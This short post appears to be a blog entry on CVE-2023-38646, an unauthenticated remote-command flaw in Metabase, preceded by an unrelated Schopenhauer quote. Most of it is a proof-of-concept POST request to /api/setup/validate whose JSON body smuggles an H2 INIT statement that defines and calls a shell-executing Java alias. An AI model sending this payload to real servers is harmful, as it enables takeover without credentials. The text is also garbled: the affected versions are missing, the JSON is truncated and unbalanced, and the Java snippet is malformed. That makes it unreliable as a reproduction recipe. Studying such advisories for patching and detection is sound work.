Rascals are always sociable, and the chief sign that a man has any nobility in his character is the little pleasure he takes in others company. Arthur Schopenhauer

CVE-2023-38646: Metabase Pre-auth RCE

Metabase is a popular business intelligence and data visualization software package. Earlier this week, it was reported that Metabase open source before and Metabase Enterprise before has a vulnerability that allows attackers to execute arbitrary commands on the server, at the server’s privilege level. Authentication is not required for exploitation. This vulnerability was designated as CVE-2023-38646. Reproducing CVE-2023-38646: Metabase Pre-auth RCE


POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0 
Connection: close

"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws {Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('touch /tmp/xxx');"},"name":"x","engine":"postgres"}}